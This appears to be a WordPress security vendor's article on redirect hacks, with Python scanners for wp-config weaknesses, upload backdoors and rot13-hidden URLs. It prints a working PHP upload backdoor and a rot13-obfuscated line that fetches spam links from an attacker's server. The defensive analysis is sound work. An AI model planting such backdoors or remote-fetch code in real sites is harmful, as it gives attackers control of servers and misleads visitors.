WordPress Doctor has been recovering sites that have suffered malware tampering. In this article we explain the redirect hack (tampering in which visitors to the site are sent, without their consent, to Chinese sites, fake security sites and the like) that a particularly large number of sites have been hit by recently: what the code looks like and how it works.


Prerequisite: the hacker takes over WordPress administrator privileges

Hackers first take over WordPress administrator privileges by one of the following methods.

Brute-forcing the login screen: repeatedly trying passwords (automated by software) until an administrator login succeeds.
Exploiting vulnerabilities in plugins, themes, or WordPress itself to gain administrator privileges.
Exploiting a flaw in the wp-config.php settings (for example, the unique authentication keys not being set) to take over administrator privileges.

WordPress has a function for editing files from the administration screen, and once administrator privileges have been obtained, this function can be used to embed malicious code into the site.
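A check for the two wp-config.php weaknesses named above: the file editor left enabled, and the unique authentication keys missing or still at their placeholder value. This is an added example written for this article, not code from WordPress Doctor or from WordPress itself; the two config fragments are constructed samples, while DISALLOW_FILE_EDIT and the eight key/salt constant names are the real WordPress names.

```python
import re

# WordPress constants that wp-config.php must define with unique values.
SALT_NAMES = (
    "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
    "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT",
)
PLACEHOLDER = "put your unique phrase here"  # text shipped in wp-config-sample.php
MIN_KEY_LENGTH = 32

# Matches define('NAME', value); the value runs up to the closing parenthesis.
DEFINE_RE = re.compile(r"""define\(\s*['"](?P<name>\w+)['"]\s*,\s*(?P<value>[^)]*?)\s*\)\s*;""")

# Constructed sample configs (not taken from any real site).
HARDENED_CONFIG = "<?php\n" + "".join(
    f"define('{name}', 'c{index}K8f1VqZl0P3mWcRtYxBn4JdHs2GaUe9VoTqZ7yH2pL9x');\n"
    for index, name in enumerate(SALT_NAMES)
) + "define('DISALLOW_FILE_EDIT', true);\n"

WEAK_CONFIG = (
    "<?php\n"
    "define('AUTH_KEY',        'put your unique phrase here');\n"
    "define('SECURE_AUTH_KEY', 'put your unique phrase here');\n"
)


def parse_defines(config_text):
    """Return {constant_name: raw_value_text} for every define() in the file."""
    return {m.group("name"): m.group("value") for m in DEFINE_RE.finditer(config_text)}


def audit_wp_config(config_text):
    """Return a list of findings; an empty list means both checks pass."""
    defines = parse_defines(config_text)
    findings = []
    # Without DISALLOW_FILE_EDIT, any compromised admin account can write PHP
    # into theme and plugin files from the dashboard.
    if defines.get("DISALLOW_FILE_EDIT", "").lower() != "true":
        findings.append("DISALLOW_FILE_EDIT is not true: the theme and plugin file editor "
                        "stays available to any compromised administrator account")
    # Each key/salt must exist and must not be the sample placeholder or trivially short.
    for name in SALT_NAMES:
        value = defines.get(name)
        if value is None:
            findings.append(f"{name} is not defined")
        elif PLACEHOLDER in value.lower() or len(value.strip("'\"")) < MIN_KEY_LENGTH:
            findings.append(f"{name} is a placeholder or too short")
    return findings


if __name__ == "__main__":
    for label, text in (("hardened", HARDENED_CONFIG), ("weak", WEAK_CONFIG)):
        print(label, audit_wp_config(text) or "OK")
```

Point audit_wp_config at the contents of a real wp-config.php to run the same checks; a site whose keys are absent falls back to database-stored values, which is why the check treats a missing constant as a finding rather than ignoring it.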

Tampering that redirects users to a page on a different domain no matter which page they access

To redirect users no matter which page they land on, for example from a search engine, hackers must plant redirection code in files that WordPress always loads.
Files that are loaded every time the site is displayed include index.php and wp-config.php, as well as header.php and footer.php in the theme; these are the files with the highest probability of being tampered with by hackers.

The image above is a capture of actual tampering code embedded in wp-config.php.
You can see that an @include statement loads and executes a file from another location. In many cases the malware code is obfuscated in this way so that what the process does cannot be understood at a glance.

Placing a file on the site that allows arbitrary files to be uploaded to the server

The redirect hacks that have become widespread in recent years always include a file with the following code on the server. It may be disguised as a plugin, or placed in the wp-content folder under a name such as wpcsesapps.php.

// Mode 1: save an uploaded file to a path chosen by the request sender
if (isset($_POST['upload'])){
    if ($_POST['upload']=='1'){
        $uploadfile = $_POST['path'] . $_FILES['uploadfile']['name'];
        if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile))
        {echo 'ok';}
        else {echo $_FILES['uploadfile']['error'];}
    }
    // Mode 2: append the posted text to a file at the chosen path
    if ($_POST['upload']=='2'){
        $fp=fopen($_POST['path'],'a');
        fwrite($fp,"\r\n");
        fwrite($fp, $_POST['uploadfile']);
        fclose($fp);
        echo 'ok';
    }
}
// Requests without the upload parameter are redirected elsewhere
else {header('Location: . /... /');}

This code is very dangerous: it lets anyone upload any file to the server from outside, creating a backdoor through which hackers can tamper with the server at will.
Because this file is not obfuscated, malware scanners that look only for obfuscated code cannot detect it.
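A small static scanner for the two kinds of tampering described so far: the @include of a disguised payload from an always-loaded file (wp-config.php, index.php, header.php, footer.php), and the unobfuscated upload backdoor, which an obfuscation-only scanner misses but whose combination of move_uploaded_file, fopen and fwrite with request-controlled paths is easy to match. This is an added example written for this article, not WordPress Doctor's plugin; the three PHP samples are constructed, and the wpcsesapps.php path and wp-content/index.php exception are the only site-specific assumptions.

```python
import re

# Constructed PHP samples modelled on the tampering described in this article;
# none of these are real site files.
SAMPLES = {
    "wp-config.php": "<?php\n@include \"/tmp/.cache/.s.ico\";\ndefine('DB_NAME', 'wp');\n",
    "wp-content/wpcsesapps.php": (
        "<?php\nif (isset($_POST['upload'])) {\n"
        "  $uploadfile = $_POST['path'] . $_FILES['uploadfile']['name'];\n"
        "  move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile);\n"
        "  $fp = fopen($_POST['path'], 'a'); fwrite($fp, $_POST['uploadfile']); fclose($fp);\n"
        "}\n"
    ),
    "wp-content/themes/mytheme/header.php": (
        "<?php\nrequire_once get_template_directory() . '/inc/helpers.php';\n"
    ),
}

# include/require of a string literal; captures the literal path.
INCLUDE_RE = re.compile(r"""@?\b(?:include|require)(?:_once)?\s*\(?\s*['"]([^'"]+)['"]""")
REQUEST_VAR = r"\$_(?:POST|GET|REQUEST)\["


def scan_php(path, text):
    """Return a list of findings for one PHP file (empty when nothing matched)."""
    findings = []
    # 1. An always-loaded file pulling in something that is not a .php file
    #    (the @include in wp-config.php shown above loads a disguised payload).
    for m in INCLUDE_RE.finditer(text):
        target = m.group(1)
        if not target.lower().endswith(".php") or "\\x" in target:
            findings.append(f"{path}: include/require of unusual file {target!r}")
    # 2. The upload backdoor: a saved upload or file write whose destination
    #    comes straight from the request. WordPress core's own upload handler
    #    is not scanned here, which keeps this rule from firing on it.
    if "move_uploaded_file(" in text and re.search(REQUEST_VAR, text):
        findings.append(f"{path}: move_uploaded_file with a request-controlled destination")
    if re.search(r"fopen\(\s*" + REQUEST_VAR, text):
        findings.append(f"{path}: fopen on a request-controlled path")
    if re.search(r"fwrite\(\s*\$\w+\s*,\s*" + REQUEST_VAR, text):
        findings.append(f"{path}: fwrite of raw request data")
    # 3. A loose PHP file sitting directly in wp-content, as wpcsesapps.php does.
    #    wp-content/index.php is the one legitimate file at that level.
    if re.fullmatch(r"wp-content/[^/]+\.php", path) and path != "wp-content/index.php":
        findings.append(f"{path}: PHP file directly under wp-content")
    return findings


def scan_site(files):
    """Scan {relative_path: contents}; return only the files that have findings."""
    results = {}
    for path, text in files.items():
        findings = scan_php(path, text)
        if findings:
            results[path] = findings
    return results


if __name__ == "__main__":
    for path, findings in scan_site(SAMPLES).items():
        print("\n".join(findings))
```

Run it over wp-config.php, index.php and the wp-content tree rather than the whole WordPress core; the rules are signatures for the patterns on this page, so treat a hit as a file to inspect by hand, not as proof on its own.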

Embedding code that redirects to a malicious site into every link on the site's pages

There was also a case in which a theme was tampered with by embedding malicious JavaScript in footer.php; the moment a user clicks any link on any page of the site, they are redirected to a different site.

The XXXXXX part has been masked.

This code plants, for every link on the site, a fake link that sends the user to a different site. It is also quite clever: using a cookie, it suppresses the function for a certain period for users who have already been redirected, so that it fires only once every few hours.

Linking to other sites with similar tampering using arbitrary keywords

Finally, a common characteristic of this redirect hack is that it also includes what is called an SEO hack.
An SEO hack exploits the mechanism by which search engines rank a site higher based on the number of links pointing to it: the hacker secretly embeds links to sites containing malicious code into the site, without the administrator being aware of it.
To output these links, the hacker embeds the following tampering into the site:

The xxxxxxxxx part has been masked.

@file_get_contents(str_rot13("uggc://scrq8.bet/xxxxxxxxx"));

This code retrieves the SEO-hack link list in real time from a server the hacker controls, so the hacker can change at any time which site URLs are pushed into the search engines.
The list obtained this way is output inside the tampered site without anyone noticing, and the search engines pick it up.
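The str_rot13 wrapper only hides the URL from a casual reader: rot13 is its own inverse, so applying it again reveals the server the link list is fetched from. The following added example (written for this article, not WordPress Doctor's code) finds every str_rot13("...") literal in a PHP file, decodes it, and reports the ones that are URLs fed straight into a fetch function; the sample file is constructed from the one-liner above, with the same masked path.

```python
import codecs
import re

# Constructed sample of a tampered theme file, modelled on the str_rot13
# wrapper shown above (the path portion is masked, as in the article).
SAMPLE = (
    "<?php\n"
    "$links = @file_get_contents(str_rot13(\"uggc://scrq8.bet/xxxxxxxxx\"));\n"
    "echo $links;\n"
)

# str_rot13("...") with a single- or double-quoted literal argument.
ROT13_LITERAL_RE = re.compile(r"""str_rot13\(\s*(['"])(.*?)\1\s*\)""")
# A remote-fetch function fed directly by such a call.
REMOTE_FETCH_RE = re.compile(
    r"""(file_get_contents|curl_init|fopen)\(\s*str_rot13\(\s*(['"])(.*?)\2\s*\)"""
)


def decode_rot13_literals(php_text):
    """Return [(encoded, decoded)] for every str_rot13("...") literal in the file.

    rot13 is its own inverse, so decoding is the same operation the malware performs."""
    return [(m.group(2), codecs.decode(m.group(2), "rot13"))
            for m in ROT13_LITERAL_RE.finditer(php_text)]


def remote_link_sources(php_text):
    """Return [(function, decoded_url)] where a decoded rot13 literal is a URL
    handed to a fetch function: the hacker's real-time link-list server."""
    found = []
    for m in REMOTE_FETCH_RE.finditer(php_text):
        decoded = codecs.decode(m.group(3), "rot13")
        if re.match(r"https?://", decoded):
            found.append((m.group(1), decoded))
    return found


if __name__ == "__main__":
    for encoded, decoded in decode_rot13_literals(SAMPLE):
        print(f"{encoded} -> {decoded}")
    print(remote_link_sources(SAMPLE))
```

The decoded hostname is what to block at the outbound firewall and to search for across the rest of the site, since the same server is typically referenced from more than one tampered file.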

Reference Article
WordPress Defacement Recovery: 5000+ List of Hacked WordPress Sites Discovered

How to Detect Redirect Hack Malware?

The plugin created by WordPress Doctor can detect redirect hack malware:
Free WordPress Doctor: Malware Scan Plugin